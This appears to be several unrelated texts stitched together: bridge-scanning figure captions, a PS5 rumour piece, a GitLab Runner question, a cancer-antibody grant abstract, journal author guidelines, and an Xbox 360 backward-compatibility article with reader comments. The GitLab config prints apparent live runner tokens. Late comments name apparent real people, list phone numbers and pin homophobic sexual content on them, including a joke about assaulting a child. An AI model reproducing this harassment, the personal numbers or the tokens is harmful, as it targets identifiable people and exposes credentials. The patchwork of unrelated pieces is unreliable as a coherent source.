scans.](sensors-18-04332-g006){#sensors-18-04332-f006} ![Images refer to point cloud structural processing: (**a**) TIN situated on the point cloud, (**b**,**c**) and the intensity map imposed on a TIN (see [Appendix A](#app1-sensors-18-04332){ref-type="app"}, [Table A1](#sensors-18-04332-t0A1){ref-type="table"}) grid.](sensors-18-04332-g007){#sensors-18-04332-f007} ![General modal states of the composite bridge \[[@B9-sensors-18-04332]\].](sensors-18-04332-g008){#sensors-18-04332-f008} ![Block diagram of the proposed framework.](sensors-18-04332-g009){#sensors-18-04332-f009} ![Facets the composite bridge diaphragm generated by the FM algorithm: (**a**) axonometry; and (**b**) side view.](sensors-18-04332-g010){#sensors-18-04332-f010} ![Spheres translation method: (**a**) mesh grid of the bridge diaphragm surface with displaced spheres; (**b**) mesh grid; (**c**) bridge diaphragm surface with displaced objects; and (**d**) flat signals on the bridge diaphragm surface.](sensors-18-04332-g011){#sensors-18-04332-f011} ![Three analyzed sections on the lateral surface of the bridge diaphragm.](sensors-18-04332-g012){#sensors-18-04332-f012} ###### Deformation of the bridge diaphragm in the perpendicular direction during proof loading: STM in three sections and total station (mm); (**a**) Load U1: 1 + 2; (**b**) Load U1: 1 + 2 + 3; (**c**) Load U1: 1 + 2 + 3 + 4; (**d**) Load U1: 2 + 3 + 4; (**e**) Load U1: 3 + 4; and (**f**) Load U1: 4. ![](sensors-18-04332-g013a) ![](sensors-18-04332-g013b) ###### Displacement of the bridge diaphragm in the vertical direction during proof loading: STM in three sections + total station + deflectometer \[mm\]; (**a**) Load U1: 1 + 2; (**b**) Load U1: 1 + 2 + 3; (**c**) Load U1: 1 + 2 + 3 + 4; (**d**) Load U1: 2 + 3 + 4; (**e**) Load U1: 3 + 4; and (**f**) Load U1: 4. ![](sensors-18-04332-g014a) ![](sensors-18-04332-g014b) sensors-18-04332-t001_Table 1 ###### Mesh plane data from both points in time, after facet generation (m). Epoch X Coordinate Y Coordinate Z Coordinate ---------------- -------------- -------------- -------------- Surface center 1 --2.112770 1.403070 --0.054039 2 --2.132400 1.373320 --0.056683 Normal vector 1 0.835015 --0.544994 --0.075702 2 0.835581 --0.546797 --0.053072 sensors-18-04332-t002_Table 2 ###### Visual analysis of the 3D model changes that have occurred, along with the illustrations. No. Illustration and Description ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- -------------------------------- 1 ![](sensors-18-04332-i001.jpg) Both scans were superimposed on one another and formed into two interpenetrating mesh models. Using the compartments of two overlapped schemes, the state of change is visible in the course of a composite bridge span overloading. 2 ![](sensors-18-04332-i002.jpg) Bridge span support region, where it can be seen that two mesh models penetrate each other in a uniform manner, indicating that this place shifted after the proof loading process. 3 ![](sensors-18-04332-i003.jpg) Bridge span the middle-bottom region, where it is visible that the two mesh models interpenetrate in a homogenous way. This indicates that this place does not shift in the perpendicular direction, but it might be seen, by looking at signal placed to the bridge, that the surface has moved in the vertical direction by a small amount. 4 ![](sensors-18-04332-i004.jpg) Bridge span middle-bottom region, in which it is visible that the two mesh models do not interpenetrate, indicating that this place does not shift in the perpendicular direction. 5 ![](sensors-18-04332-i005.jpg) On the illustration above the mesh model corresponding to the more deformed state is presented in red color. The character of the deformation is visible. Displacement of the side surface has occurred with tilting in the perpendicular direction, determined by the three-dimensional polyline in a parabolic shape. The deformation silhouette may indicate a place where increased stresses start to occur. The elliptical shape of the polyline is puzzling. We can explain it by the increased rigidity of the upper part of the lateral surface caused by the diaphragm lip, perpendicular to the plane of the shell, which closes the top. 6 ![](sensors-18-04332-i006.jpg) Obstacles placed between the scanned object and a scanner device cause rifts in the point cloud structure. The breaches, so-called shadows, have been caused by people who passed through in front of the lateral surface of the bridge span during measurement. 7 ![](sensors-18-04332-i007.jpg) The diaphragm lip of the bridge is subject to rotation. sensors-18-04332-t003_Table 3 ###### Spheres translation method (STM) example: position change of the sphere SD2 in time (mm). Initial Deformed ----------------- --------------- --------------- Sphere code Sphere SD2_S1 Sphere SD2_S2 Set points zone 0.01 0.02 X −1.76 −1.77 Y 1.94 1.95 Z 0.05 0.05 sensors-18-04332-t004_Table 4 ###### Proof loading of the composite bridge: load combinations \[[@B8-sensors-18-04332]\]. Load Scheme Image Load Scheme Image ------------------- -------------------------------- --------------- -------------------------------- U1: 1 + 2 ![](sensors-18-04332-i008.jpg) U1: 2 + 3 + 4 ![](sensors-18-04332-i009.jpg) U1: 1 + 2 + 3 ![](sensors-18-04332-i010.jpg) U1: 3 + 4 ![](sensors-18-04332-i011.jpg) U1: 1 + 2 + 3 + 4 ![](sensors-18-04332-i012.jpg) U1: 4 ![](sensors-18-04332-i013.jpg)
null
minipile
NaturalLanguage
mit
null
[Update] According to Game Informer's Andrew Reiner, the PlayStation 5 target specs are higher than the Xbox Scarlett's, something which adds more fuel to the rumors circulating online. [Original Story] The PlayStation 5 and Xbox Scarlett consoles have finally been unveiled, but details on both of them are currently quite scarce, as specs haven't been detailed so far. According to developers who have received dev kits for both systems, however, one of the two is definitely more powerful. Bethesda’s Full Back Catalog Could Be on Xbox Game Pass, Provided Phil Spencer Approves On the latest episode of his podcast, former IGN editor Colin Moriarty revealed that the PlayStation 5 is more powerful than the Xbox Scarlett, judging from reports of developers who have received the developer kits for both systems. While it's true that the final specs of consoles are different from the ones seen in the dev kits, there's a good chance that this report is right, as this isn't the first time we heard that the Sony next-gen console is going to be the more powerful than Microsoft's system. Developers have been praising Sony's new system quite a bit since its unveiling. Earlier this month, Yakuza series general director Toshihiro Nagoshi stated that the console has amazing processing power and that artificial intelligence and machine learning will play a central role. The processing power of PlayStation 5 is incredible, so when we try to think of new gameplay that will utilize its full potential, I’m not really sure which aspects of existing mechanics we should translate. First there was a time when graphics improved, then there was network features, and now I guess you can say its a return to the “programmable” era? I think artificial intelligence and machine learning will continue to evolve. The PlayStation 5 console will be released on a yet to be confirmed release date.
null
minipile
NaturalLanguage
mit
null
Q: GitLab Runner - Docker Image I started to work with GitLab CI/CD. I have setup my own GitLab-runner with docker executor. It is working fine. When I read about docker, I came to know that it creates a separate space for each run so that we could even access it and use it. I would like to know the path in which the docker images are created. This is my config.toml concurrent = 1 check_interval = 0 [session_server] session_timeout = 1800 [[runners]] name = "Linux-Docker1" url = "https://gitlab.com/" token = "4-UWY1A_J2rS7r32wxJi" executor = "docker" builds_dir = "/var/working/gitlab-runner-docker" [runners.custom_build_dir] [runners.cache] [runners.cache.s3] [runners.cache.gcs] [runners.docker] tls_verify = false image = "ruby:2.6" privileged = false disable_entrypoint_overwrite = false oom_kill_disable = false disable_cache = false volumes = ["/cache"] shm_size = 0 [[runners]] name = "Linux-Shell1" url = "https://gitlab.com/" token = "LzdxrS1zA58rXihSQWCn" executor = "shell" builds_dir = "/var/working/gitlab-runner" [runners.custom_build_dir] [runners.cache] [runners.cache.s3] [runners.cache.gcs] This is my .gitlab-ci.yml file stages: - build - test build: stage: build script: - whoami - mkdir test-build - touch test-build/info.txt - ls - pwd - cd .. - pwd - ls artifacts: paths: - test-build/ test: stage: test script: - echo "Test Script" - ls - test -f "test-build/info.txt" A: In your case you didn't create a docker image, because in your build step you do not run docker build command about the path, if you build a docker image, you need to push it to a container registry (docker hub or a private one) look at this doc to know how to do it https://docs.gitlab.com/ee/ci/docker/using_docker_build.html
null
minipile
NaturalLanguage
mit
null
The overall objective of this proposal is to develop a more effective therapeutic approach for the selective destruction of cancer cells. We propose to investigate the feasibility of combining the potential tumor specificity of monoclonal antibodies directed against tumor-associated antigens with the high linear energy transfer, short-range alpha radiations emitted in the decay of 211At. Astatine-211-labeled monoclonal antibodies offer the attractive possibility of matching the cellular specificity of an antibody with radiation of approximately cellular range. The antibody chosen for these studies is OC 125, a monoclonal antibody directed against a surface antigen present on human ovarian cancer cells. We have labeled OC 125 with I125, studied its interaction with human ovarian carcinoma cells in vitro and demonstrated selective uptake of I125 activity in human ovarian tumor implants in athymic mice. The specific aims are: (1) to label OC 125 with At211 using an acylation reaction without decreasing its affinity for ovarian cancer cells; (2) to measure the radiotoxicity of At211-labeled OC 125 in ovarian cancer cell lines; (3) to measure the therapeutic efficacy of At211-labeled OC 125 administered intraperitoneally to mice with malignant ascites; (4) to study the effects of several factors including antibody dose and circulating antigen level on the pharmacokinetics of labeled OC 125 and F(ab')2 and Fab' fragments in nude mouse models of ovarian cancer; and (5) to study the therapeutic utility of At211-labeled OC 125 in nude mice bearing human ovarian tumor xenografts. Although the proposed studies are limited to the study of in vitro and in vivo model systems, it is important to bear in mind that if the proposed experiments are successful, treatment of ovarian cancer might be possible via intraperitoneal and/or intravenous administration of At211-labeled antibodies.
null
minipile
NaturalLanguage
mit
null
Online Submissions Registration and login are required to submit items online and to check the status of current submissions. Author Guidelines Jurnal Entomologi Indonesia receives two types of manuscript i.e. article and short communication. Detail of manuscript preparation and submission are available in this link. Manuscript should be submitted together with cover letter. Cover letter must be pasted in the "comments for the editor" (step 1, submission process). Manuscript will be rejected if not follow the guidelines or not attach the cover letter. Submission Preparation Checklist As part of the submission process, authors are required to check off their submission's compliance with all of the following items, and submissions may be returned to authors that do not adhere to these guidelines. The manuscript has not been or is not being published in other scientific journals Scriptwriting has followed the guidelines scriptwriting of Jurnal Entomologi Indonesia The cover letter has recommended at least three (3) names of reviewers to examine the manuscript Text file formats are DOC or DOCX Copyright Notice Authors who publish in Jurnal Entomologi Indonesia agree to the following terms: a. Authors retain copyright and grant the journal right of first publication with the work simultaneously licensed under a Creative Commons Attribution License that allows others to share the work with an acknowledgement of the work's authorship and initial publication in this journal. b. Authors are able to enter into separate, additional contractual arrangements for the non-exclusive distribution of the journal's published version of the work, with an acknowledgement of its initial publication in this journal. c. Authors are permitted and encouraged to post their work online prior to and during the submission process, as it can lead to productive exchanges, as well as earlier and greater citation of published work. Privacy Statement The names and email addresses entered in Jurnal Entomologi Indonesia will be used exclusively for the stated purposes of this journal and will not be made available for any other purpose or to any other party. Author Fees This journal charges the following author fees. Article Submission: 0.00 (IDR) Authors are required to pay an Article Submission Fee as part of the submission process to contribute to review costs. Article Publication: 2000000.00 (IDR) If this paper is accepted for publication, you will be asked to pay an Article Publication Fee to cover publications costs. Publishing cost is Rp.2.000.000 (maximally 10 pages for each article) for non-member of Perhimpunan Entomology Indonesia. There will be extra charges for extra pages Rp 150.000 per page. If you are member of PEI, the publishing cost is Rp.1.250.000 (maximally 10 pages for each article) and for extra pages Rp.150.000 per page. Additional fee for colour artwork: If there is colour artwork in your manuscript when it is accepted for publication, Jurnal Entomologi Indonesia require you to pay additional cost, Rp.300.000 per page, before your paper can be published. If you do not have funds to pay such fees, you will have an opportunity to waive each fee. We do not want fees to prevent the publication of worthy work.
null
minipile
NaturalLanguage
mit
null
If you've been wondering patiently what Xbox games you can play on your new Xbox 360 at launch time, your wait is finally over. Microsoft has released a list of Xbox games that will be backwards-compatible with the next-gen gaming console. The good news is that the Xvox 360 will be backwards-compatible with over 200 Xbox games at the November 22nd launch date. The better news is that original Xbox games will be displayed in 720p or 1080i High Definition Television format, so Xbox games will look even better on the 360. Be sure to check out what Xbox games will work on your Xbox 360 and which ones won't by looking at the Xbox backward-compatibility list for up-to-date info. Thanks to IGN for the heads-up. USER COMMENTS 66 comment(s) !ST POST(3:43pm EST Mon Nov 14 2005)Will the games be HD or will the 360 just send an HD feed for lower res. pics. - by LORDWICKET Sigh(3:45pm EST Mon Nov 14 2005)So to sum up what 'backward compatibility' has turned out to be for the 360: * There is no backwards compatibility.* Microsoft is essentially doing quick and easy ports of whatever titles they feel like* Whatever other titles will become available is up to the whim of Microsoft – and they were never keen on BC to begin with. Blah. - by Cheif well(3:57pm EST Mon Nov 14 2005)Halo 2 is on the list. im good to go. - by imExcitebike The list is incomplete(3:57pm EST Mon Nov 14 2005)It is a preliminary list that isn't through being updated, so sit back and watch it grow before your eyes. Cheif, did you read the list? I would say that your first fanboy bullet is incorrect. Your next two are assumptions based on your personal bias towards the system. - by Early Adopter early adopter(4:03pm EST Mon Nov 14 2005)that list is a final list. no more games will be updated. ms is a big company, they do what they want when they want. and they dont care. its not a secret or anything. - by ChuckyCheese XBOX 360 Backwards Compatability Titles…(4:04pm EST Mon Nov 14 2005)Just took a quick glance-over, wow… Missing A LOT of titles… Noticed one of my personal recent “fun” games “Destroy All Humans” was even missing… How were the titles chosen? Blah… No BLU-RAY or even the lesser HD-DVD, and not even planned backwards compatability? As I have a PC w/XBOX 360 controller and 7800 GTX – the PS3 and Revolution look like the consoles to watch for now! - by TYJK crappy(4:07pm EST Mon Nov 14 2005)I dont own a single game that is on that list. Also, I'm surprized that there are not more microsoft games supported. Notably Halo 1, and 2, and Jade Empire - by Whiskers early adopter(4:08pm EST Mon Nov 14 2005)MS are doing quick and easy ports, they have had to resort to providing 'profiles' to allow Xbox games to work on X360. Essentially the profile is a special purpose driver that emulates the specific NVidia features used in the game originally by translating/transforming the API calls to ATI compatible API calls. So ewach game on the list has been ported to the new box. Granted the game is not recompiled in PowerPC code, it's still native x86 code, but that's emulated too. It's a cool way to go about providing some measure of backward compat, especiallya s they were not originally going to offer it, and the graphics H/W is so different. I have no doubt that the list will grow some, but it will never offer the level of backwards compatability that Sony provided in the PS2, and seems commited to provide in PS3. Whether the degree of compatability and/or number of games 'up-ported' to X360 is sufficient for you I don't know. As the saying goes YMMV, personally I'd have said that they were better being clear and either doing BC in full of completely skipping it. Once again though, YMMV. - by X360 Cynic. Pretty sad(4:09pm EST Mon Nov 14 2005)I mean, to have to develop a new software emulator for each game kind of suggests that Microsoft didn't invest all that much time really in the new Xbox. They took a new CPU and Video card and slapped together another OEM box. I think the problem here is that MS burnt all their bridges with the co-developers of the Xbox, Intel and nVidia. In both cases, relations became strained, and as a result, MS couldn't go back and rely on these companies to come up with some hardware based emulator chip to be implemented in the Xbox360. It would have been nice for MS to simply throw in some embedded Pentium II CPU, a mobile nVidia GPU, and some Xbox-on-a-chip solution to support old XBox games. Considering all these technologies are now 5+ years old, you could probably squeeze them all onto one low-power chip. I.e. just like what the PS2 did to support the original PS games, put the PS on a chip and embedded it in the PS2. I doubt the xbox games supported won't run at full speed. Anything MS tries to emulate (re VirtualPC) runs slow as a dog, chances are most people won't want to run old Xbox games on the new 360. It was a nice attempt, and if they did manage to pull of full-speed emulations of their more popular titles like Halo, it could be beneficial, but this is definitely MS playing catchup to a feature that should have been designed into the Xbox360 from the start. Then again, how many “popular” titles have MS come out with that don't have Halo in the name? Hopefully Sony is watching and not planning some software based emulation scheme for PS2 games.- by Topher TYJK(4:12pm EST Mon Nov 14 2005)I have an ati radeon x800xl and it does about 200 million more triangles then the xbox 360 will but I dont even have 1/3rd of the the processing power since its going to a tri core 3.2 ghz + about 9.6 ghz so you cant discount it yet because your computer isnt going do do that well either. when it somes do it its the processor that really matters I only have a amd athlon 64 3500 granted and that is pretty decent but my computer wont perform nearly as well for it because the games wont be optimized like it is on a game cycle. As far as nintendo goes I hope that the inovation will work but I doubt that it will. and sony they will send you something defective littered in excuses - by mr. spock glanced too quick(4:15pm EST Mon Nov 14 2005)I take that back, upon looking closer Halo1&2 and Jade Empire are on the list. - by Whiskers badd(4:22pm EST Mon Nov 14 2005)An emulator? LMFAO. The games will look great in HD, but will lag just like any other emulator. Sony already takes the cake with backwards compatibility, and Nintendo is on the right track by opening up their catalog of games. M$ doesn't have clue.Sony = teh win - by FatSonyFanBoy And Another Thing(4:23pm EST Mon Nov 14 2005)Since these are new executables that you are going to have to download I am really suspicious if they will play exactly like the originals. I would want to hear from real gamers who are familiar with the games who can vouch that they really are the same games and not full of all sorts of subtle timing issues and other non-obvious differences. - by Cheif The games are FORWARD compatiable(4:25pm EST Mon Nov 14 2005)with the new conosle, rite? - by Cindy re: FSFB(4:39pm EST Mon Nov 14 2005) “This trend – started by Sony with the PS2, as backwards compatibility in home consoles was certainly not the norm before then – is set to continue with the PS3, which will offer emulation for the PS2 and hence for the PSone.” LMFAO.SONY DOESN'T HAVE A CLUE… EMULATION… WTF???SONY = THE LOSER. - by Just a few notes…(4:40pm EST Mon Nov 14 2005)This is list is by no means final, additional game profiles will be added for download through xboxlive. As Doug noted backwards compatible games will play at either 720p or 1080i, plus they will all have FSAA, so they should look quite a bit better than they did on the xbox. Bungie actually has screenshots of Halo with the upgrades: In all it's probably about as much as we could have hoped for. Keep in mind many consoles have had zero backwards compatibility. If they can add more titles I would imaqine they will be in pretty good shape. - by El Barto Can't believe this is a geek forum(4:48pm EST Mon Nov 14 2005)some of you have no idea how emulation works in terms of bc as for the PS3, if anyone gives their money to Sony for ANYTHING after the Malware debacle with their audio cds, then they are part of the problem with big corps. Make yourselves heard. Boycott Sony, don’t encourage their irresponsible behavior that has punished so many for buying their product legally. If you do buy a PS3, Beware the restrictive format that will be blu ray. You think they want to control their music content? Just think about their gaming content and how much potential dollars are involved. Your blu ray drive will be discussing your childhood and your favorite colors once you decide to network it with all of your other online devices. Sony is in the business to make money like the rest of them, unfortunately their business plan involves some very unfriendly consumer practices. It is a necessary evil when you make the hardware and the content. The difference between sony and apple is that apple has done it in a successful and consumer friendly manner, whereas sony just said “The consumer doesn’t even know what a rootkit is, why should they care if it get installed or not?” - by Early Adopter Halo(5:00pm EST Mon Nov 14 2005)Which of those two screenshot is better? 1) The original one with sharp textures and jaggies or 2) the 360 one with blurry textures and less jaggies ? I don't give a damn about minor graphic changes. I want to pop my xbox disk in the 360 and just play. I don't want to download anything. I don't want to wait for Microsoft to finally decide to take the trouble to port games. If Sony can do it and Nintendo is talking about doing it, WHY THE HELL CAN'T MICROSOFT. - by Cheif You can't play any backward games without a HD(5:10pm EST Mon Nov 14 2005)Xbox 360 old-game support needs hard drive – MS Microsoft has posted a list of 212 Xbox games that are backward-compatible with the Xbox 360 – but only next-generation consoles with a hard drive. - by huh(5:42pm EST Mon Nov 14 2005)yeah yeah yeah yeah, bla bla bla. you ppl downplay both 360 and ps3 now, but when the systems come out, your all gonna own a ps3,360, and revolution. all these systems are gonna be 100x more powerfull than their predecessors. just because the systems carries the ibm,ait,and nvidia brand name doesnt mean its gonna be another pc. nintendo,nec,sega all used chips that were once used for desktop computers in the early 80's. - by bla huh(5:56pm EST Mon Nov 14 2005)ooooooooooopssss. nevermind, ive seen pics of 360 games and they look a little better than xbox games,for now. damn the dinosaurs in kingkong for 360 look shitty.i guess they still cant give objects curves, they look like boxes. - by bla re: cheif(7:52pm EST Mon Nov 14 2005) there you go fanboy… ps2 is not 100% backwards compatible… and the ps2 model number SCPH-75000 does even play all ps2 games. I'm still waiting on sony to update certain PS1 games so I can play on my ps2 and I am waiting on sony to update certain ps2 games so I can play on my ps2. - by Sony…(8:59pm EST Mon Nov 14 2005)Ohh old sony, so nice… Not even the PS2 itself can play all games…WTF? yeah not even current compatibility, how can we hope for backwards? Sony consumers are either donkeys or retarded humans. - by says me Chief(9:11pm EST Mon Nov 14 2005)Chief you are a troll just like fatsonyfanboy, if you can't tell that 720p with 2x FSAA is better than 480p with no AA then you shouldn't be posting in this forum. That is hardly a “minor” graphics change as you claim. But guess what, if you don't like the 360 don't buy one, none of us are too worried about whether you have one or not. As far as the PS3 goes backwards compatibility is a non-issue for the time being it won't be out until xmas 06'…at the earliest. - by El Barto To the guy with no name…(10:34pm EST Mon Nov 14 2005)They give a list of the games that don't work in your link. Also, in your link, they say that short little list of games that don't work are out of 8000 titles. Third, this condition of certain specified games that don't work on the SCPH-75000 model of the Playstation 2, is specific to THAT model of Playstation 2. Models SCPH-70000 and earlier don't have that compatibility issue. You ARE right, though. The Playstation 2 is not 100% backward compatible, models aside. Most people know that. It's more like 99% backward compatible. ) About the Xbox360, it's bad enough it'll cost an extra 100 simoleons to play your old Xbox games, even worse when this addon will not make your Xbox360 even 25% compatible with Xbox games that you may already own. Good for me that I still own my original v1.1 Xbox. I suggest you guys relying on backward compatibility out of your Xbox360 to forget it. Just buy yourself a regular Xbox before Microsoft discontinues them next year. ) - by Ramza Beoulve I don't know what's worse… xbox 360 not being 100% backwards compatible with older gen xbox games… or ps2 not being 100% compatible with current gen ps2 games? you don't have to pay 100 “simoleons” to be 100% backwards compatible… if you own an xbox game, you must already own an xbox… now plug that into AV2 on your TV… and VOILA… 100% backwards compatibility… I know it's hard to comprehend… much harder than checking what model ps2 you are buying to make sure it is 100% compatible with the current gen games. - by Xbox 360.(1:43am EST Tue Nov 15 2005)Not nearly as much hype this time around. I think people were underwhelmed last time. Feels like there isn't nearly as much anticipation for any of the systems this time around. Or could it be that there are so many games that are basically a rehash of what we've seen a million times. Hopefully someone will come up with a fresh angle. - by bored only good game on X-box is(1:44am EST Tue Nov 15 2005)Only good game is nightcaster - by dd To the guy with no name…(3:11am EST Tue Nov 15 2005)“the important games are there… halo 1&2, jade empire, fable, gta 3 vice city and san andreas, the simpsons(both), ninja gaiden(both),…” Not to me, they aren't. I only have 4 Xbox games, and 2 of them are unplayable, as of yet, on the Xbox360. All are pretty high profile titles. “you don't have to pay 100 “simoleons” to be 100% backwards compatible… if you own an xbox game, you must already own an xbox… now plug that into AV2 on your TV… and VOILA… 100% backwards compatibility…” I wasn't speaking for myself. I mean those unfortunate of you who are banking on more than 25% of all the Xbox games out there being playable on an Xbox 360. “I know it's hard to comprehend… much harder than checking what model ps2 you are buying to make sure it is 100% compatible with the current gen games” As I said before, I addressed MY issue with backward compatibility in my previous post, so no need to repeat to me what I already stated. A couple of other things. The SCPH-75000 model Playstation 2 is a Japanese Playstation 2, so you don't have anything to worry about unless you live there, or import.. especially since you already know (I'm giving you the benefit of the doubt here) that only the SCPH-75000 models of Playstation 2 suffer from that incopatibility issue. Lastly, by the way, deducing what model Playstation 2 you have is as simple as looking at the label on the back. I know this may be hard for you to comprehend. - by Ramza Beoulve Controller(7:51am EST Tue Nov 15 2005) I hope to god that the new PS3 controller vibrates. I just love when I play my PS2 the controller goes all crazey on me and vibrates in my lap it just tickles my tushey and my lil walnuts. Oops sorry guys and gals this is a side of me that dosent get out very often so my boyfriend says.. - by FatSonyFanBoy Backwards compatability my arse!(8:49am EST Tue Nov 15 2005)I agree with Cheif. There is no Backwards compatability. Out of the box you will only be able to play ONE of the old Xbox games. You have to connect to Xbox live to download an emulator for each of the game you wish to play. Backwards compatability – what a load of rubbish. And also, I don't realy care, my last console was a SNES. - by MFBD re: u know(8:58am EST Tue Nov 15 2005)the ps2 model # SCPH-75000 does not play ATV offroad 3 and everquest… WTF… THEY ARE FRIGGIN PS2 SONY TITLES that don't play on a PS2. - by I know. do you? Re:Backwards compatability my arse!(10:52am EST Tue Nov 15 2005)Actually connecting to Live isn't the only way to get the updated profiles, you can download them and burn them to a CD from Xbox.com, or order a CD (yes you have to pay shipping and handling) and get the latest profiles from MS. Also you don't have to connect to the internet each time you put in an old game, only have to connect if the profile isn't in the last batch you have. Why all this hating on emulation? The Revolution is going to be doing the same thing and you have to repay (except Gamecube titles) for classic titles (no cartridge slot to use old games you may already have), also no one knows how Sony is going to do their backwards compatibility yet (haven't seen anything in the specs for the PS3 saying that it also has an Emotion engine in it along with Cell). The initial list isn't horrible, it has glaring omissions, but according to the MS they are still working on expanding it (I am ticked that Doom 3 and Jet Grind Radio aren't there, but they say more are coming). When I pick up the 360 I'm most likely going to be focused on Kameo and Condemned, but I'll also play old titles too, only a few won't work out for me, but then I'll fall back on the old Xbox, it'll be the same probably when I pick up a PS3, and the Revolution (thank god they are a year away my habit's going to drive me to the poor house LOL). - by ShadowSelf New Better Anyways(5:58pm EST Tue Nov 15 2005)They might release a update later on support more games. These news reports mean nothing! Anything is possible don't get caught up in all this crap. It's not that big of deal to make the games work on 360 it's just why? Are you tossing out the old XBOX? I play a game on the XBOX beat it then what keep playing same game over and over? I am ready for new games better graphics and sound I personally could care less I am putting the old XBOX in a spare room with all the old games. I rather rent them at least the ones I play to just beat it for the reason it was made. Only games I am gonna buy are online multiplayers and don't want to play Halo or Halo II on this machine if it doesn't take advantage of the HD experience! - by Just_Opinions why worry about backward compatibility(7:09pm EST Tue Nov 15 2005)The XBOX 360 is a huge system, and all the old games are pointless to play on the new one, they would look no different. The problem is games cost like 60 dollars which is pretty bad. I am getting the system and a couple of games for free so the backward compatibility doesn't matter.This site gives them away free with free shipping just for doing free offers through companies like AOL and stamps.com(USPS) its really a pretty easy site and it doesnt cost anything, check it out. - by z-dizzle I think(7:13am EST Wed Nov 16 2005)It's disapointing there is no backwards compatability out of the box. But I suppose the emulation is something at least, still, I think many people had higher hopes of backwards compatability that were not met. If I said anything wrong in my last post, then oh well, you don't actually have to know anything to post here :) - by MFBD ShadowSelf's comment(10:05am EST Wed Nov 16 2005)Dude, people who already own the xbox games aren't going to want to connect to the internet and get emulators for games (and the console) they might already own. With the revolution, you can download the games off the internet, games you may not have. My point is that its stupid to have to download emulators for games you already have that can be played on the last generation console, if you know what i mean. It's a good idea to download old classics that you don't have. Besides, i live in Butt F**k nowhere, ontario, canada, and don't have high speed internet where i live, so connecting to the internet or getting the emulators from mailing companies etc, is going to be a major pain in the butt just to play my Xbox games. - by Chrisguy Then again…(10:06am EST Wed Nov 16 2005)getting the old revolution games will be a pain as well too. DAMN YOU BELL AND YOUR CRAPPY DIAL UP!!! - by Chrisguy HAHAHHAAHA….(10:50am EST Wed Nov 16 2005)You must be a complete fucken lame ass if you dont have hi speed internet! And your a gamer. You limey ass lame retarded pudd wackers. Ive got the shizzel for hi speed and I wont have a problem with getten downloadable content. MS is looken toward the future you dweebs. So go spend some money and get the hi speed internet or fucken write your government if you live in BF egypt and tell them you want hi speed in your area. If you have the money hi speed will come - by DWEEB SLAYER Re: Chrisguy(8:55am EST Thu Nov 17 2005)Dude you don't have to connect to the internet to get the latest emulator profiles at all, as I stated you can get an update disk from Microsoft as well, you will have to pay shipping and handling in that case though. Also since the emulator upadates can be burned to a CD using a computer it would be possible to get a copy of them from a friend who does have a high speed connection. - by ShadowSelf xbox games to on the xbox 360(6:07pm EST Sat Nov 19 2005)I am asking to know what xbox games will work on the xbox 360 because I like the old xbox games as well as the xbox 360 games when will we know because there some games that I would like to buy on xbox 360 - by Darren Bacciochi XBOX 360(8:05pm EST Wed Dec 07 2005)XBOX owner and happy to be I haven't yet bought the 360 but I bet that sooner or later the XBOX platform games will rarefy compares to the Sony PS titles.I take for granted the huge amount of games available on PS2 while on XBOX just few. I believe the same will happen on the 360.I believe that even if Sony is developing blu ray well is just a fuckin games platform so sooner or later fuck the Xbox and go on Sony.More games is more fun! ya bunch of Wincks - by Big Daddy who cares?(4:19pm EST Thu Dec 08 2005)I just want to know how many people actually will play xbox games once they have a 360? i, and many of my mates bought a PS2 at launch, and i can 100& truthfully say that i put Gran Turismo 2 into it once to check that it actually was backward compatible (it was new at the time, had to see it to belive :p) and that was it, once the games were 5x better in ever department i never wanted to play any PS1 titles again on it! and neirther did any of my mates. I got a 360, i got PGR3 (so no need to play 1 or 2 anymore!) and perfect dark, that also voids ANY xbox FPS as it's so much better. Maybe it's just me and my circle of friends, and i can see some real classic, re-playable games that maybe of reason, but in genreal i don't see backwards compatiablity as a big selling point… “oh i can play my 20 ps2 games on the ps3, yippy!” …. if you think like this then why are you buying a PS3 if your going to be happy playing your current crop of games? Also to the xbox haters, of which there are many, i've had no problems with my 360 so far, it's slick as hell and online gaming is so much more fun as it actually works on this console! i still can enjoy a sony console, but unless they came up with some amazingly better, which in my eyes hasn't been proving so far, espically with them dodgy as hell new control pads, then i'm sticking with xbox. - by Barry And Also…..(4:24pm EST Thu Dec 08 2005)….the fact you can download classics like Gauntlet & Smash TV with many others to come has to be a great advantage for xbox 360? these are the classics i'd want to play, not ones i played and completed last year on my xbox. - by Barry My name……(6:35am EST Tue Dec 13 2005)My name is Glynn Cross. I am a boy of 16 years and I think I am a raging queen. I have innate tendencies to erotically seduce other males and do dirty things to their naked bodies. I love men, in other words. If you are ghey and want to hook up and bum, just give me a ring on 07765262823. ) - by The_Boy_Lover Glynn Cross(6:37am EST Tue Dec 13 2005)My name is Steve Woods and I want to hook up and bum. mmmmmmmmmmmmmm I think you sound well fit. xxxXxxx Love Ste. X - by The_Boy_Lover_Lover To those above me(6:53am EST Tue Dec 13 2005)My initials are JP and I also want to hook up with the two of you and I want a super hXc threesome with you too. I loves me some threesomes with boys. Mmhhmm I do. XxxxXxxxXxxxXxxxX - by JP Steven Woods(6:55am EST Tue Dec 13 2005)My name is Steve Woods. I am grossly homosexual and I am also a homosexual. I teach homosexualityology to boys and I am well ghey. I do physically LOVES the cack. Love Steve Kiss Kiss. (to the boys only!!!!!!!1) xxxxXxxxx - by Steven J. Woods glynn (the phag) cross(6:55am EST Tue Dec 13 2005)can i just say my name is glynn i really love to penatrate boys its the best thihng ever i remember the first time i did it whilst walkin home 1 day i saw a little boy crying i said wats up?? then for no reason ran off intot the woods and bumed him - by glynn cross ste the fatty(9:29am EST Tue Dec 13 2005)my name is steven woods i am sorry to say i am ghey i love the coc.k i am also very very large(fat) and have the smallest peanis on record. if u would like to bumme ring 07837547920 call me for some hot naked sweaty action or if u just wanna compare size - by steven woods Forwards compatibility(9:26am EST Tue Aug 08 2006)will xbox 360 games work on the original xbox? I am thinking about getting the xbox because I am short on money tight now. Since Microsoft had got to stop making xbox games sometime, I was wondering if the new games work on the old system. - by Randy backwards thing(5:23pm EST Thu Oct 12 2006)can you play xbox 360 games on ur xbox cuz i dont want to buy a xbox 360 and then all the games cuz they dont make anymore good xbox games - by joefred
null
minipile
NaturalLanguage
mit
null
